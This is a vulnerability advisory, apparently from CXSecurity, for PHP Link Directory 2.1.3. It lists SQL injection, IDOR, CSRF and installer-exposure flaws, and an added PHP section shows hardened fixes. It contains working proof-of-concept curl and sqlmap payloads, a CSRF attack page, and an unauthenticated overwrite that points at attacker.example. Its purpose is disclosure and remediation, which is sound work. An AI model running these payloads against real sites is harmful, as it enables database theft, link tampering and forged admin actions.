PHP Link Directory (phpLD) 2.1.3 - SQL Injection, IDOR, CSRF
Xasthur · 2026-06-15 · via CXSECURITY Database RSS Feed - CXSecurity.com

Title:      PHP Link Directory (phpLD) 2.1.x Multiple Vulnerabilities
Product:    PHP Link Directory (phpLD)
Vendor:     NetCreated, Inc. / phplinkdirectory.com (EOL)
Version:    2.1.3 (also affects 2.1.x branch; tested on 2.1.3)
Type:       SQL Injection, IDOR, CSRF, Information Disclosure
Risk:       High (authenticated SQLi) / Medium (unauthenticated IDOR)
Discovered: 2026-06-14
Advisory:   PHPLD-2026-001

================================================================================
SUMMARY
================================================================================

PHP Link Directory 2.1.3 contains several security issues:

[1] SQL Injection in admin/dir_validate.php (POST CATEGORY_ID)
[2] SQL Injection in admin panel via ORDER BY (GET sort -> session)
[3] Insecure Direct Object Reference in add_reciprocal.php (no auth)
[4] CSRF on admin state-changing GET actions (dir_links_edit.php)
[5] Exposed install/ directory after deployment (configuration risk)

Public-facing search (index.php?q=) and submit.php CAPTCHA are NOT SQL
injectable in default code (parameters are escaped). Do not report those
as SQLi without a separate bypass.

================================================================================
TEST ENVIRONMENT (local PoC only)
================================================================================

Software : phpLD 2.1.3
PHP      : 5.x / 7.x (legacy code)
DBMS     : MySQL / MariaDB
URL      : http://127.0.0.1/phpld/   <-- change to your local path

Prerequisites:
- Completed /install/ setup
- At least one admin user
- At least one active link (STATUS=2) for IDOR test
- At least one link in a category for dir_validate test

================================================================================
[1] SQL INJECTION - admin/dir_validate.php (CATEGORY_ID)
================================================================================

File   : admin/dir_validate.php (line ~122)
Auth   : Required (admin or editor session)
Method : POST
Param  : CATEGORY_ID

Vulnerable code:

    if ($_REQUEST['CATEGORY_ID'] > 0) {
        $where = " WHERE CATEGORY_ID = '".$_REQUEST['CATEGORY_ID']."'";
    }
    $rs = $db->Execute("SELECT ... FROM PLD_LINK {$where}");

CATEGORY_ID is concatenated into SQL without escaping.

--- PoC: Time-based blind (manual curl) ---

Step 1 - Authenticate and save session cookie:

    curl -c cookies.txt -X POST \
      "http://127.0.0.1/phpld/admin/login.php" \
      -d "user=admin&pass=admin&submit=Login" -L

Step 2 - Trigger SLEEP (expect ~5 second delay):

    curl -b cookies.txt -X POST \
      "http://127.0.0.1/phpld/admin/dir_validate.php" \
      -d "submit=Start&VALIDATE_LINKS=1&VALIDATE_RECPR=0&CATEGORY_ID=1'+AND+SLEEP(5)--+-"

Step 3 - Boolean comparison (all links vs none):

    CATEGORY_ID=1' OR '1'='1
    CATEGORY_ID=1' AND '1'='2

--- PoC: sqlmap ---

    sqlmap -u "http://127.0.0.1/phpld/admin/dir_validate.php" \
      --auth-url="http://127.0.0.1/phpld/admin/login.php" \
      --auth-data="user=admin&pass=admin&submit=Login" \
      --auth-type=POST \
      --data="submit=Start&VALIDATE_LINKS=1&VALIDATE_RECPR=0&CATEGORY_ID=1" \
      -p CATEGORY_ID \
      --dbms=mysql --prefix="1'" --suffix="-- -" \
      --batch --random-agent --time-sec=5

Impact: Full database read/write as DB user (admin credentials dump,
link/category tampering).

Fix: Use $db->qstr($_REQUEST['CATEGORY_ID']) or intval() whitelist.

================================================================================
[2] SQL INJECTION - admin ORDER BY (sort parameter)
================================================================================

File   : admin/init.php (line ~216), used by multiple admin/*.php
Auth   : Required
Method : GET (stored in session, injected on next page load)
Param  : sort

Vulnerable flow:

    $_SESSION['sort'][SCRIPT_NAME]['field'] = $_REQUEST['sort'];
    ...
    $orderBy = ' ORDER BY '. SORT_FIELD.' '.SORT_ORDER;

Affected examples:

    admin/conf_users.php
    admin/conf_payment.php
    admin/email_message.php
    admin/email_sent_view.php

--- PoC: Two-step ORDER BY time-based (MySQL) ---

Step 1 - Login (see above), save cookies.txt

Step 2 - Poison session via sort parameter:

    curl -b cookies.txt \
      "http://127.0.0.1/phpld/admin/conf_users.php?sort=LOGIN,(SELECT+*+FROM+(SELECT+SLEEP(5))a)"

Step 3 - Load page to execute ORDER BY:

    curl -b cookies.txt \
      "http://127.0.0.1/phpld/admin/conf_users.php"

(Expect ~5s response on step 3 if injectable.)

--- PoC: sqlmap (may require session handling) ---

    curl -b cookies.txt \
      "http://127.0.0.1/phpld/admin/conf_users.php?sort=LOGIN"

    sqlmap -u "http://127.0.0.1/phpld/admin/conf_users.php" \
      --load-cookies=cookies.txt \
      -p sort --technique=T --dbms=mysql --batch

Fix: Whitelist allowed column names before storing in session.

================================================================================
[3] IDOR - add_reciprocal.php (unauthenticated link update)
================================================================================

File   : add_reciprocal.php (line ~71-94)
Auth   : NOT required
Method : GET + POST
Param  : id, RECPR_URL

Any user who knows/guesses a valid link ID with empty RECPR_URL can update
that link record without proving ownership.

Vulnerable code:

    if ($data = $db->GetRow("SELECT * FROM PLD_LINK WHERE ID = ".$db->qstr($id))) {
        $data['RECPR_URL'] = $_REQUEST['RECPR_URL'];
        ...
        $db->Replace($tables['link']['name'], $data, 'ID', true);
    }

--- PoC: Unauthenticated reciprocal link overwrite ---

Replace LINK_ID with an existing link ID where RECPR_URL IS NULL.

    # Verify form is shown (link exists, recpr empty):
    curl -s "http://127.0.0.1/phpld/add_reciprocal.php?id=LINK_ID" | \
      grep -i "Reciprocal Link URL"

    # Overwrite reciprocal URL (no cookie, no login):
    curl -X POST "http://127.0.0.1/phpld/add_reciprocal.php?id=LINK_ID" \
      -d "RECPR_URL=http://attacker.example/reciprocal.html&submit=Add"

    # Verify in DB:
    SELECT ID, URL, RECPR_URL FROM PLD_LINK WHERE ID=LINK_ID;

Impact: Unauthorized modification of directory link metadata; SEO /
reciprocal-link integrity compromise.

Fix: Require signed token or owner email verification; bind update to
submitter session/secret.

================================================================================
[4] CSRF - admin link management via GET
================================================================================

File   : admin/dir_links_edit.php
Auth   : Admin session (victim must be logged in)
Method : GET
Param  : action

Examples (victim admin must visit attacker page while logged in):

    /admin/dir_links_edit.php?action=D:123     (delete link 123)
    /admin/dir_links_edit.php?action=A:123     (approve link 123)
    /admin/dir_links_edit.php?action=S:123:2   (set status)

PoC HTML (host on attacker server, victim opens while admin):

    <html><body>
    <img src="http://127.0.0.1/phpld/admin/dir_links_edit.php?action=D=1" />
    <img src="http://127.0.0.1/phpld/admin/dir_links_edit.php?action=A:1" />
    </body></html>

Note: Use action format with colon: action=A:1 not action=D=1

Fix: CSRF tokens; use POST for state changes; SameSite cookies.

================================================================================
[5] INFORMATION DISCLOSURE - install/ left accessible
================================================================================

If install/ is not removed after setup, installer remains reachable and may
allow database reconfiguration depending on server state.

PoC:

    curl -I "http://127.0.0.1/phpld/install/index.php"

Expected after install: 404 or 403. If 200 OK -> misconfiguration.

Fix: Delete install/ directory after installation.

================================================================================
REMEDIATION (vendor / administrator)
================================================================================

1. Remove install/ after setup
2. Patch dir_validate.php - escape CATEGORY_ID
3. Whitelist sort columns in admin/init.php
4. Add CSRF tokens to all admin mutating actions
5. Add ownership check to add_reciprocal.php
6. Upgrade to supported software; phpLD 2.1.x is end-of-life
7. Do not expose admin panel to internet without IP restriction / 2FA

================================================================================
TIMELINE
================================================================================

2026-06-14  Discovery and local verification
2026-xx-xx  Vendor notification (if applicable)
2026-xx-xx  Public disclosure

================================================================================
CREDIT
================================================================================

Researcher: [Xasthur]
Reference:  PHPLD-2026-001

================================================================================
LEGAL
================================================================================

PoC is intended for authorized local testing and responsible disclosure only.
Unauthorized access to systems you do not own is illegal.

================================================================================
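The code-level remediation items 2 to 5 (escaped CATEGORY_ID, whitelisted sort columns, CSRF tokens on mutating admin actions, ownership check in add_reciprocal.php), worked through as an added PHP example. This is neither phpLD's code nor the advisory author's: it assumes PHP 7.1 or later (hash_equals, random_bytes, nullable types), the ADOdb-style $db object that the advisory's snippets show, and a hypothetical RECPR_TOKEN column on PLD_LINK; the SORT_COLUMNS list and every helper name are constructed for illustration.

```php
<?php
// Added example (not phpLD's code): hardened replacements for the four
// code-level issues in the advisory. Helper names, the SORT_COLUMNS table and
// the RECPR_TOKEN column are hypothetical; PHP 7.1+ is assumed.

// [1] CATEGORY_ID: accept only a positive integer, then emit it as an int literal.
// The original "> 0" test let "1' AND SLEEP(5)-- -" through because PHP
// compared the leading "1"; FILTER_VALIDATE_INT rejects the whole string.
function buildCategoryWhere(array $req): string
{
    $id = filter_var($req['CATEGORY_ID'] ?? '', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    return $id === false ? '' : ' WHERE CATEGORY_ID = ' . (int) $id;
}

// [2] sort: whitelist column names per admin script BEFORE anything is stored
// in the session, so a poisoned value can never reach ORDER BY on a later load.
const SORT_COLUMNS = [
    'conf_users.php' => ['ID', 'LOGIN', 'EMAIL', 'DATE_ADDED'], // hypothetical list
];

function safeSortField(string $script, ?string $requested, string $default): string
{
    $allowed = SORT_COLUMNS[$script] ?? [];
    // strict in_array: "LOGIN,(SELECT * FROM (SELECT SLEEP(5))a)" is not an element
    return in_array($requested, $allowed, true) ? $requested : $default;
}

function safeSortOrder(?string $requested): string
{
    return strtoupper((string) $requested) === 'DESC' ? 'DESC' : 'ASC';
}

// [3] add_reciprocal.php: bind the update to a secret handed to the submitter
// when the link was created (assumed RECPR_TOKEN column, random per link).
function reciprocalUpdateAllowed(array $linkRow, ?string $presentedToken): bool
{
    if (empty($linkRow['RECPR_TOKEN']) || $presentedToken === null) {
        return false;
    }
    // Only links that have no reciprocal yet may be updated, and only by the
    // token holder; hash_equals avoids a timing side channel on the compare.
    $recprEmpty = ($linkRow['RECPR_URL'] ?? '') === '';
    return $recprEmpty && hash_equals($linkRow['RECPR_TOKEN'], $presentedToken);
}

// [4] admin actions: per-session CSRF token, accepted only on POST.
function csrfToken(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

function csrfValid(string $method, array $post, ?string $sessionToken): bool
{
    // State changes over GET are refused outright, so an <img src="...?action=D:1">
    // embedded on another site can never carry a valid request.
    if ($method !== 'POST' || $sessionToken === null || !isset($post['csrf'])) {
        return false;
    }
    return hash_equals($sessionToken, (string) $post['csrf']);
}

// Checks on constructed inputs mirroring the advisory's payloads (all print bool(true)).
var_dump(buildCategoryWhere(['CATEGORY_ID' => "1' AND SLEEP(5)-- -"]) === '');
var_dump(buildCategoryWhere(['CATEGORY_ID' => '7']) === ' WHERE CATEGORY_ID = 7');
var_dump(safeSortField('conf_users.php', 'LOGIN,(SELECT * FROM (SELECT SLEEP(5))a)', 'ID') === 'ID');
var_dump(safeSortField('conf_users.php', 'LOGIN', 'ID') === 'LOGIN');
var_dump(reciprocalUpdateAllowed(['RECPR_URL' => '', 'RECPR_TOKEN' => 'abc'], 'abc') === true);
var_dump(reciprocalUpdateAllowed(['RECPR_URL' => '', 'RECPR_TOKEN' => 'abc'], null) === false);
var_dump(csrfValid('GET', ['csrf' => 'tok'], 'tok') === false);
var_dump(csrfValid('POST', ['csrf' => 'tok'], 'tok') === true);
```

The session cookie should additionally be issued with the SameSite attribute the advisory recommends (session_set_cookie_params with 'samesite' => 'Lax' on PHP 7.3+), which stops the cross-site GET even before the token check runs; the token remains necessary because SameSite does not cover every browser or same-site subdomain scenario.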
Copyright 2026, cxsecurity.com